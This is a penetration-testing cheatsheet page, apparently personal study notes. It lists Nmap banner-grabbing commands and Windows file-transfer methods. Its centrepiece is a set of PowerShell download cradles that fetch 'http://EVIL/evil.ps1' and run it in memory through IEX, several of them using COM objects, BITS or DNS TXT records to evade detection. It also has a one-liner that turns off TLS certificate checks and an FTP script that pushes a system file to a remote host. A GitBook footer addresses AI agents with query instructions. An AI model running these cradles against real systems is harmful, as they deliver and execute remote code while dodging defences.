> For the complete documentation index, see [llms.txt](https://notes.alvinpanerio.com/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://notes.alvinpanerio.com/cheatsheet.md).

# Cheatsheet

## Nmap

### Running an Nmap Script

```bash
nmap --script <SCRIPT_NAME> -p<PORT> <DOMAIN/IPADDRESS>
```

## Banner Grabbing

```bash
nmap -sV --script=banner <DOMAIN/IPADDRESS>
```

```bash
netcat <IP_ADDRESS> <PORT>
```

```bash
nc -nv <IP_ADDRESS> <PORT>
```

```bash
curl -IL <DOMAIN>
```

## Windows File Transfer Methods (Download Operations)

### PowerShell Base64 Encode & Decode&#x20;

> Downloading from Linux machine to Windows machine using Base64

On Linux Machine

```bash
cat <FILE> | base64 -w 0;echo
```

On Windows Machine

```powershell
[IO.File]::WriteAllBytes("C:\<LOCATION>\<FILENAME>", [Convert]::FromBase64String("<BASE64>"))
```

### PowerShell Web Downloads

#### PowerShell DownloadFile Method

```powershell
(New-Object Net.WebClient).DownloadFile('<URL>','C:\<LOCATION>\<FILENAME>')
```

```powershell
(New-Object Net.WebClient).DownloadFileAsync('<URL>','C:\<LOCATION>\<FILENAME>')
```

#### PowerShell DownloadString - Fileless Method

> Executes directly to the memory

```powershell
IEX (New-Object Net.WebClient).DownloadString('<URL>')
```

```powershell
(New-Object Net.WebClient).DownloadString('<URL>') | IEX
```

#### PowerShell Invoke-WebRequest

Alternative (Fast)

```powershell
iwr
curl
wget
```

```powershell
Invoke-WebRequest <URL> -OutFile <FILENAME>`
```

#### PowerShell Cradles

> From HarmJ0y, <https://gist.github.com/HarmJ0y/bb48307ffa663256e239>

```powershell
# normal download cradle
IEX (New-Object Net.Webclient).downloadstring("http://EVIL/evil.ps1")

# PowerShell 3.0+
IEX (iwr 'http://EVIL/evil.ps1')

# hidden IE com object
$ie=New-Object -comobject InternetExplorer.Application;$ie.visible=$False;$ie.navigate('http://EVIL/evil.ps1');start-sleep -s 5;$r=$ie.Document.body.innerHTML;$ie.quit();IEX $r

# Msxml2.XMLHTTP COM object
$h=New-Object -ComObject Msxml2.XMLHTTP;$h.open('GET','http://EVIL/evil.ps1',$false);$h.send();iex $h.responseText

# WinHttp COM object (not proxy aware!)
$h=new-object -com WinHttp.WinHttpRequest.5.1;$h.open('GET','http://EVIL/evil.ps1',$false);$h.send();iex $h.responseText

# using bitstransfer- touches disk!
Import-Module bitstransfer;Start-BitsTransfer 'http://EVIL/evil.ps1' $env:temp\t;$r=gc $env:temp\t;rm $env:temp\t; iex $r

# DNS TXT approach from PowerBreach (https://github.com/PowerShellEmpire/PowerTools/blob/master/PowerBreach/PowerBreach.ps1)
#   code to execute needs to be a base64 encoded string stored in a TXT record
IEX ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String(((nslookup -querytype=txt "SERVER" | Select -Pattern '"*"') -split '"'[0]))))

# from @subtee - https://gist.github.com/subTee/47f16d60efc9f7cfefd62fb7a712ec8d
<#
<?xml version="1.0"?>
<command>
   <a>
      <execute>Get-Process</execute>
   </a>
  </command>
#>
$a = New-Object System.Xml.XmlDocument
$a.Load("https://gist.githubusercontent.com/subTee/47f16d60efc9f7cfefd62fb7a712ec8d/raw/1ffde429dc4a05f7bc7ffff32017a3133634bc36/gistfile1.txt")
$a.command.a.execute | iex
```

#### UseBasicParsing Error

```powershell
Invoke-WebRequest <URL> -UseBasicParsing | IEX
```

#### Could not establish relationship (SSL/TLS Certificate is not trusted)

```ps
[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}
```

### SMB Downloads

#### No Authentication

On Linux, create SMB Server

```bash
sudo impacket-smbserver share -smb2support /tmp/smbshare
```

On Windows, copy the file from SMB Server

```powershell
copy \\<IPADRESS>\share\<FILENAME>
```

#### With Authentication

On Linux, create SMB Server with username and password

```bash
sudo impacket-smbserver share -smb2support /tmp/smbshare -user test -password test
```

On Windows, mount SMB Server with username and password

```powershell
net use n: \\<IPADRESS>\share /user:<USERNAME> <PASSWORD>
```

```powershell
copy n:\<FILENAME>
```

### FTP Downloads

#### Using pyftpdlib

On Linux, set up FTP Server

```bash
sudo pip3 install pyftpdlib
sudo python3 -m pyftpdlib --port 21
```

On Windows, transfer files from FTP Server using PowerShell

```powershell
(New-Object Net.WebClient).DownloadFile('ftp://<IPADDRESS>/<FILENAME>', 'C:\<LOCATION>\<FILENAME>')
```

#### Create a Command File for the FTP Client and Download the Target File

```
C:\htb> echo open 192.168.49.128 > ftpcommand.txt
C:\htb> echo USER anonymous >> ftpcommand.txt
C:\htb> echo binary >> ftpcommand.txt
C:\htb> echo PUT c:\windows\system32\drivers\etc\hosts >> ftpcommand.txt
C:\htb> echo bye >> ftpcommand.txt
C:\htb> ftp -v -n -s:ftpcommand.txt
ftp> open 192.168.49.128

Log in with USER and PASS first.


ftp> USER anonymous
ftp> PUT c:\windows\system32\drivers\etc\hosts
ftp> bye
```

## Windows File Transfer Methods (Upload Operations)


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://notes.alvinpanerio.com/cheatsheet.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.